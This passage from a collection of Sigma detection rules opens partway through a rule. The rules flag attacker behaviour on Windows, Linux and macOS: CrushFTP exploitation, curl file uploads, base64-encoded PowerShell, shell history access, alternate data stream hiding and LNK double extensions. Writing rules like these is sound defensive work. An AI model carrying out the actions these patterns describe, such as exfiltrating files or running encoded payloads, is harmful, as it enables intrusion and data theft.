    - cve.2025-24054
logsource:
    product: windows
    category: file_event
detection:
    selection:
        TargetFilename|endswith: '.library-ms'
        Image|endswith:
            - '\7z.exe'
            - '\winrar.exe'
            - '\explorer.exe'
    condition: selection
falsepositives:
    - Legitimate Library shortcuts under %APPDATA%\Microsoft\Windows\Libraries\ (rarely created by end-users)
    - Custom corporate scripts that programmatically generate .library-ms Files
level: medium

title: Suspicious CrushFTP Child Process
id: 459628e3-1b00-4e9b-9e5b-7da8961aea35
status: experimental
description: |
    Detects suspicious child processes spawned by the CrushFTP service that may indicate exploitation of remote code execution vulnerabilities such as
    CVE-2025-31161, where attackers can achieve RCE through crafted HTTP requests.
    The detection focuses on commonly abused Windows executables (like powershell.exe, cmd.exe etc.) that attackers typically use post-exploitation to execute malicious commands.
references:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-2825
    - https://www.crushftp.com/crush11wiki/Wiki.jsp?page=Update
    - https://outpost24.com/blog/crushftp-auth-bypass-vulnerability/
    - https://attackerkb.com/topics/k0EgiL9Psz/cve-2025-2825/rapid7-analysis
    - https://projectdiscovery.io/blog/crushftp-authentication-bypass
author: Craig Sweeney, Matt Anderson, Jose Oregon, Tim Kasper, Faith Stratton, Samantha Shaw, Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-04-10
tags:
    - attack.initial-access
    - attack.execution
    - attack.t1059.001
    - attack.t1059.003
    - attack.t1190
    - cve.2025-31161
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\crushftpservice.exe'
    selection_child:
        Image|endswith:
            - '\bash.exe'
            - '\cmd.exe'
            - '\cscript.exe'
            - '\mshta.exe'
            - '\powershell.exe'
            - '\powershell_ise.exe'
            - '\pwsh.exe'
            - '\sh.exe'
            - '\wscript.exe'
    condition: all of selection_*
falsepositives:
    - Legitimate CrushFTP administrative actions
    - Software updates
level: medium

title: Suspicious Curl Change User Agents - Linux
id: b86d356d-6093-443d-971c-9b07db583c68
related:
    - id: 3286d37a-00fd-41c2-a624-a672dcd34e60
      type: derived
status: test
description: Detects a suspicious curl process start on linux with set useragent options
references:
    - https://curl.se/docs/manpage.html
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-09-15
tags:
    - attack.command-and-control
    - attack.t1071.001
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        Image|endswith: '/curl'
        CommandLine|contains:
            - ' -A '
            - ' --user-agent '
    condition: selection
falsepositives:
    - Scripts created by developers and admins
    - Administrative activity
level: medium

title: Suspicious Curl File Upload - Linux
id: 00b90cc1-17ec-402c-96ad-3a8117d7a582
related:
    - id: 00bca14a-df4e-4649-9054-3f2aa676bc04
      type: derived
status: test
description: Detects a suspicious curl process start the adds a file to a web request
references:
    - https://twitter.com/d1r4c/status/1279042657508081664
    - https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file
    - https://curl.se/docs/manpage.html
    - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html
author: Nasreddine Bencherchali (Nextron Systems), Cedric MAURUGEON (Update)
date: 2022-09-15
modified: 2023-05-02
tags:
    - attack.exfiltration
    - attack.command-and-control
    - attack.t1567
    - attack.t1105
logsource:
    category: process_creation
    product: linux
detection:
    selection_img:
        Image|endswith: '/curl'
    selection_cli:
        - CommandLine|contains:
              - ' --form' # Also covers the "--form-string"
              - ' --upload-file '
              - ' --data '
              - ' --data-' # For flags like: "--data-ascii", "--data-binary", "--data-raw", "--data-urlencode"
        - CommandLine|re: '\s-[FTd]\s' # We use regex to ensure a case sensitive argument detection
    filter_optional_localhost:
        CommandLine|contains:
            - '://localhost'
            - '://127.0.0.1'
    condition: all of selection_* and not 1 of filter_optional_*
falsepositives:
    - Scripts created by developers and admins
level: medium

title: Suspicious Diantz Alternate Data Stream Execution
id: 6b369ced-4b1d-48f1-b427-fdc0de0790bd
status: test
description: Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
references:
    - https://lolbas-project.github.io/lolbas/Binaries/Diantz/
author: frack113
date: 2021-11-26
modified: 2022-12-31
tags:
    - attack.stealth
    - attack.t1564.004
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - diantz.exe
            - .cab
        CommandLine|re: ':[^\\]'
    condition: selection
falsepositives:
    - Very Possible
level: medium

title: Suspicious Diantz Download and Compress Into a CAB File
id: 185d7418-f250-42d0-b72e-0c8b70661e93
status: test
description: Download and compress a remote file and store it in a cab file on local machine.
references:
    - https://lolbas-project.github.io/lolbas/Binaries/Diantz/
author: frack113
date: 2021-11-26
modified: 2022-08-13
tags:
    - attack.command-and-control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - diantz.exe
            - ' \\\\'
            - '.cab'
    condition: selection
falsepositives:
    - Unknown
level: medium

title: Suspicious Driver Install by pnputil.exe
id: a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1
status: test
description: Detects when a possible suspicious driver is being installed via pnputil.exe lolbin
references:
    - https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax
    - https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html
author: Hai Vaknin @LuxNoBulIshit, Avihay eldad  @aloneliassaf, Austin Songer @austinsonger
date: 2021-09-30
modified: 2022-10-09
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1547
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - '-i'
            - '/install'
            - '-a'
            - '/add-driver'
            - '.inf'
        Image|endswith: '\pnputil.exe'
    condition: selection
falsepositives:
    - Pnputil.exe being used may be performed by a system administrator.
    - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
    - Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium

title: Suspicious Electron Application Child Processes
id: f26eb764-fd89-464b-85e2-dc4a8e6e77b8
related:
    - id: 378a05d8-963c-46c9-bcce-13c7657eac99
      type: similar
status: test
description: |
    Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of ".asar" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule)
references:
    - https://taggart-tech.com/quasar-electron/
    - https://github.com/mttaggart/quasar
    - https://positive.security/blog/ms-officecmd-rce
    - https://lolbas-project.github.io/lolbas/Binaries/Msedge/
    - https://lolbas-project.github.io/lolbas/Binaries/Teams/
    - https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/
    - https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-10-21
modified: 2024-07-12
tags:
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith:
            # Add more electron based app to the list
            - '\chrome.exe' # Might require additional tuning
            - '\discord.exe'
            - '\GitHubDesktop.exe'
            - '\keybase.exe'
            - '\msedge.exe'
            - '\msedgewebview2.exe'
            - '\msteams.exe'
            - '\slack.exe'
            - '\teams.exe'
            # - '\code.exe' # Prone to a lot of FPs. Requires an additional baseline
    selection_child_image:
        Image|endswith:
            # Add more suspicious/unexpected paths
            - '\cmd.exe'
            - '\cscript.exe'
            - '\mshta.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\regsvr32.exe'
            - '\whoami.exe'
            - '\wscript.exe'
    selection_child_paths:
        Image|contains:
            # Add more suspicious/unexpected paths
            - ':\ProgramData\'
            - ':\Temp\'
            - '\AppData\Local\Temp\'
            - '\Users\Public\'
            - '\Windows\Temp\'
    filter_optional_discord:
        ParentImage|endswith: '\Discord.exe'
        Image|endswith: '\cmd.exe'
        CommandLine|contains: '\NVSMI\nvidia-smi.exe'
    condition: selection_parent and 1 of selection_child_* and not 1 of filter_optional_*
falsepositives:
    - Unknown
# Increase the level once FP rate is reduced (see status)
level: medium

title: Suspicious Execution of InstallUtil Without Log
id: d042284c-a296-4988-9be5-f424fadcc28c
status: test
description: Uses the .NET InstallUtil.exe application in order to execute image without log
references:
    - https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/
    - https://learn.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool
author: frack113
date: 2022-01-23
modified: 2022-02-04
tags:
    - attack.stealth
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\InstallUtil.exe'
        Image|contains: 'Microsoft.NET\Framework'
        CommandLine|contains|all:
            - '/logfile= '
            - '/LogToConsole=false'
    condition: selection
falsepositives:
    - Unknown
level: medium

title: Suspicious Execution of Powershell with Base64
id: fb843269-508c-4b76-8b8d-88679db22ce7
status: test
description: Commandline to launch powershell with a base64 payload
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets
    - https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/
    - https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/
author: frack113
date: 2022-01-02
modified: 2023-01-05
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith:
            - \powershell.exe
            - \pwsh.exe
        CommandLine|contains:
            - ' -e '
            - ' -en '
            - ' -enc '
            - ' -enco'
            - ' -ec '
    filter_encoding:
        CommandLine|contains: ' -Encoding '
    filter_azure:
        ParentImage|contains:
            - 'C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\'
            - '\gc_worker.exe'
    condition: selection and not 1 of filter_*
falsepositives:
    - Unknown
level: medium

title: Suspicious Execution of Shutdown
id: 34ebb878-1b15-4895-b352-ca2eeb99b274
status: test
description: Use of the commandline to shutdown or reboot windows
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown
author: frack113
date: 2022-01-01
tags:
    - attack.impact
    - attack.t1529
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\shutdown.exe'
        CommandLine|contains:
            - '/r '
            - '/s '
    condition: selection
falsepositives:
    - Unknown
level: medium

title: Suspicious Execution of Shutdown to Log Out
id: ec290c06-9b6b-4338-8b6b-095c0f284f10
status: test
description: Detects the rare use of the command line tool shutdown to logoff a user
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1529/T1529.md
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown
author: frack113
date: 2022-10-01
tags:
    - attack.impact
    - attack.t1529
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\shutdown.exe'
        CommandLine|contains: '/l'
    condition: selection
falsepositives:
    - Unknown
level: medium

title: Suspicious Execution via macOS Script Editor
id: 6e4dcdd1-e48b-42f7-b2d8-3b413fc58cb4
status: test
description: Detects when the macOS Script Editor utility spawns an unusual child process.
author: Tim Rauch (rule), Elastic (idea)
references:
    - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-7f541fbc4a4a28a92970e8bf53effea5bd934604429112c920affb457f5b2685
    - https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/
date: 2022-10-21
modified: 2022-12-28
logsource:
    category: process_creation
    product: macos
tags:
    - attack.defense-impairment
    - attack.t1566
    - attack.t1566.002
    - attack.initial-access
    - attack.t1059
    - attack.t1059.002
    - attack.t1204
    - attack.t1204.001
    - attack.execution
    - attack.persistence
    - attack.t1553
detection:
    selection_parent:
        ParentImage|endswith: '/Script Editor'
    selection_img:
        - Image|endswith:
              - '/curl'
              - '/bash'
              - '/sh'
              - '/zsh'
              - '/dash'
              - '/fish'
              - '/osascript'
              - '/mktemp'
              - '/chmod'
              - '/php'
              - '/nohup'
              - '/openssl'
              - '/plutil'
              - '/PlistBuddy'
              - '/xattr'
              - '/sqlite'
              - '/funzip'
              - '/popen'
        - Image|contains:
              - 'python'
              - 'perl'
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium

title: Suspicious Extrac32 Alternate Data Stream Execution
id: 4b13db67-0c45-40f1-aba8-66a1a7198a1e
status: test
description: Extract data from cab file and hide it in an alternate data stream
references:
    - https://lolbas-project.github.io/lolbas/Binaries/Extrac32/
author: frack113
date: 2021-11-26
modified: 2022-12-30
tags:
    - attack.stealth
    - attack.t1564.004
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - extrac32.exe
            - .cab
        CommandLine|re: ':[^\\]'
    condition: selection
falsepositives:
    - Unknown
level: medium

title: Suspicious File Created In PerfLogs
id: bbb7e38c-0b41-4a11-b306-d2a457b7ac2b
status: test
description: Detects suspicious file based on their extension being created in "C:\PerfLogs\". Note that this directory mostly contains ".etl" files
references:
    - Internal Research
    - https://labs.withsecure.com/publications/fin7-target-veeam-servers
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-05-05
tags:
    - attack.execution
    - attack.t1059
logsource:
    category: file_event
    product: windows
detection:
    selection:
        TargetFilename|startswith: 'C:\PerfLogs\'
        TargetFilename|endswith:
            - '.7z'
            - '.bat'
            - '.bin'
            - '.chm'
            - '.dll'
            - '.exe'
            - '.hta'
            - '.lnk'
            - '.ps1'
            - '.psm1'
            - '.py'
            - '.scr'
            - '.sys'
            - '.vbe'
            - '.vbs'
            - '.zip'
    condition: selection
falsepositives:
    - Unlikely
level: medium

title: Suspicious File Drop by Exchange
id: 6b269392-9eba-40b5-acb6-55c882b20ba6
related:
    - id: bd1212e5-78da-431e-95fa-c58e3237a8e6
      type: similar
status: test
description: Detects suspicious file type dropped by an Exchange component in IIS
references:
    - https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/
    - https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html
    - https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html
author: Florian Roth (Nextron Systems)
date: 2022-10-04
tags:
    - attack.persistence
    - attack.t1190
    - attack.initial-access
    - attack.t1505.003
logsource:
    product: windows
    category: file_event
detection:
    selection:
        Image|endswith: '\w3wp.exe'
        CommandLine|contains: 'MSExchange'
    selection_types:
        TargetFilename|endswith:
            - '.aspx'
            - '.asp'
            - '.ashx'
            - '.ps1'
            - '.bat'
            - '.exe'
            - '.dll'
            - '.vbs'
    condition: all of selection*
falsepositives:
    - Unknown
level: medium

title: Suspicious File Write to Webapps Root Directory
id: 89c42960-f244-4dad-9151-ae9b1a3287a2
status: experimental
description: |
    Detects suspicious file writes to the root directory of web applications, particularly Apache web servers or Tomcat servers.
    This may indicate an attempt to deploy malicious files such as web shells or other unauthorized scripts.
references:
    - https://labs.watchtowr.com/guess-who-would-be-stupid-enough-to-rob-the-same-vault-twice-pre-auth-rce-chains-in-commvault/
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-10-20
tags:
    - attack.persistence
    - attack.t1505.003
    - attack.initial-access
    - attack.t1190
logsource:
    product: windows
    category: file_event
detection:
    # Add more suspicious processes or paths or extensions as needed
    selection_susp_img:
        Image|endswith:
            - '\dotnet.exe'
            - '\w3wp.exe'
            - '\java.exe'
    selection_servers:
        TargetFilename|contains:
            - '\apache'
            - '\tomcat'
    selection_path:
        TargetFilename|contains: '\webapps\ROOT\'
    selection_susp_extensions:
        TargetFilename|endswith: '.jsp'
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium

title: Suspicious Files in Default GPO Folder
id: 5f87308a-0a5b-4623-ae15-d8fa1809bc60
status: test
description: Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder
references:
    - https://redcanary.com/blog/intelligence-insights-november-2021/
author: elhoim
date: 2022-04-28
tags:
    - attack.stealth
    - attack.t1036.005
logsource:
    product: windows
    category: file_event
detection:
    selection:
        TargetFilename|contains: '\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\'
        TargetFilename|endswith:
            - '.dll'
            - '.exe'
    condition: selection
falsepositives:
    - Unknown
level: medium

title: Suspicious FromBase64String Usage On Gzip Archive - Process Creation
id: d75d6b6b-adb9-48f7-824b-ac2e786efe1f
related:
    - id: df69cb1d-b891-4cd9-90c7-d617d90100ce
      type: similar
status: test
description: Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward.
references:
    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43
author: frack113
date: 2022-12-23
tags:
    - attack.command-and-control
    - attack.t1132.001
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        CommandLine|contains|all:
            - 'FromBase64String'
            - 'MemoryStream'
            - 'H4sI'
    condition: selection
falsepositives:
    - Legitimate administrative script
level: medium

title: Suspicious Git Clone - Linux
id: cfec9d29-64ec-4a0f-9ffe-0fdb856d5446
status: test
description: Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious
references:
    - https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-03
modified: 2023-01-05
tags:
    - attack.reconnaissance
    - attack.t1593.003
logsource:
    category: process_creation
    product: linux
detection:
    selection_img:
        Image|endswith: '/git'
        CommandLine|contains: ' clone '
    selection_keyword:
        CommandLine|contains:
            # Add more suspicious keywords
            - 'exploit'
            - 'Vulns'
            - 'vulnerability'
            - 'RCE'
            - 'RemoteCodeExecution'
            - 'Invoke-'
            - 'CVE-'
            - 'poc-'
            - 'ProofOfConcept'
            # Add more vuln names
            - 'proxyshell'
            - 'log4shell'
            - 'eternalblue'
            - 'eternal-blue'
            - 'MS17-'
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium

title: Suspicious History File Operations
id: 508a9374-ad52-4789-b568-fc358def2c65
status: test
description: Detects commandline operations on shell history files
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md
author: 'Mikhail Larin, oscd.community'
date: 2020-10-17
modified: 2021-11-27
tags:
    - attack.credential-access
    - attack.t1552.003
logsource:
    product: macos
    category: process_creation
detection:
    selection:
        CommandLine|contains:
            - '.bash_history'
            - '.zsh_history'
            - '.zhistory'
            - '.history'
            - '.sh_history'
            - 'fish_history'
    condition: selection
falsepositives:
    - Legitimate administrative activity
    - Legitimate software, cleaning hist file
level: medium

title: Suspicious Installer Package Child Process
id: e0cfaecd-602d-41af-988d-f6ccebb2af26
status: test
description: Detects the execution of suspicious child processes from macOS installer package parent process. This includes osascript, JXA, curl and wget amongst other interpreters
references:
    - https://redcanary.com/blog/clipping-silver-sparrows-wings/
    - https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/execution_installer_package_spawned_network_event.toml
author: Sohan G (D4rkCiph3r)
date: 2023-02-18
tags:
    - attack.t1059
    - attack.t1059.007
    - attack.t1071
    - attack.t1071.001
    - attack.execution
    - attack.command-and-control
logsource:
    category: process_creation
    product: macos
detection:
    selection_installer:
        ParentImage|endswith:
            - '/package_script_service'
            - '/installer'
        Image|endswith:
            - '/sh'
            - '/bash'
            - '/dash'
            - '/python'
            - '/ruby'
            - '/perl'
            - '/php'
            - '/javascript'
            - '/osascript'
            - '/tclsh'
            - '/curl'
            - '/wget'
        CommandLine|contains:
            - 'preinstall'
            - 'postinstall'
    condition: selection_installer
falsepositives:
    - Legitimate software uses the scripts (preinstall, postinstall)
level: medium

title: Suspicious Keyboard Layout Load
id: 34aa0252-6039-40ff-951f-939fd6ce47d8
status: test
description: Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only
references:
    - https://renenyffenegger.ch/notes/Windows/registry/tree/HKEY_CURRENT_USER/Keyboard-Layout/Preload/index
    - https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files
author: Florian Roth (Nextron Systems)
date: 2019-10-12
modified: 2023-08-17
tags:
    - attack.resource-development
    - attack.t1588.002
logsource:
    category: registry_set
    product: windows
    definition: 'Requirements: Sysmon config that monitors \Keyboard Layout\Preload subkey of the HKLU hives - see https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files'
detection:
    selection_registry:
        TargetObject|contains:
            - '\Keyboard Layout\Preload\'
            - '\Keyboard Layout\Substitutes\'
        Details|contains:
            - 00000429  # Persian (Iran)
            - 00050429  # Persian (Iran)
            - 0000042a  # Vietnamese
    condition: selection_registry
falsepositives:
    - Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)
level: medium

title: Suspicious LNK Double Extension File Created
id: 3215aa19-f060-4332-86d5-5602511f3ca8
related:
    - id: b4926b47-a9d7-434c-b3a0-adc3fa0bd13e
      type: derived
status: test
description: |
    Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default.
references:
    - https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/
    - https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations
    - https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles
    - https://twitter.com/malwrhunterteam/status/1235135745611960321
    - https://twitter.com/luc4m/status/1073181154126254080
author: Nasreddine Bencherchali (Nextron Systems), frack113
date: 2022-11-07
modified: 2023-10-18
tags:
    - attack.stealth
    - attack.t1036.007
logsource:
    category: file_event
    product: windows
detection:
    selection:
        TargetFilename|endswith: '.lnk'
        TargetFilename|contains:
            - '.doc.'
            - '.docx.'
            - '.jpg.'
            - '.pdf.'
            - '.ppt.'
            - '.pptx.'
            - '.xls.'
            - '.xlsx.'
    filter_main_recent:
        TargetFilename|contains: '\AppData\Roaming\Microsoft\Windows\Recent\'
    filter_optional_office_recent:
        Image|endswith:
            # Note: Some additional office application might need to be added
            - '\excel.exe'
            - '\powerpnt.exe'
            - '\winword.exe'
        TargetFilename|contains: '\AppData\Roaming\Microsoft\Office\Recent\'
    filter_optional_office_excel:
        Image|endswith: '\excel.exe'
        TargetFilename|contains: '\AppData\Roaming\Microsoft\Excel'
    filter_optional_office_powerpoint:
        Image|endswith: '\powerpnt.exe'
        TargetFilename|contains: '\AppData\Roaming\Microsoft\PowerPoint'
    filter_optional_office_word:
        Image|endswith: '\winword.exe'
        TargetFilename|contains: '\AppData\Roaming\Microsoft\Word'
    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
    - Some tuning is required for other general purpose directories of third party apps
level: medium
regression_tests_path: regression_data/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension/info.yml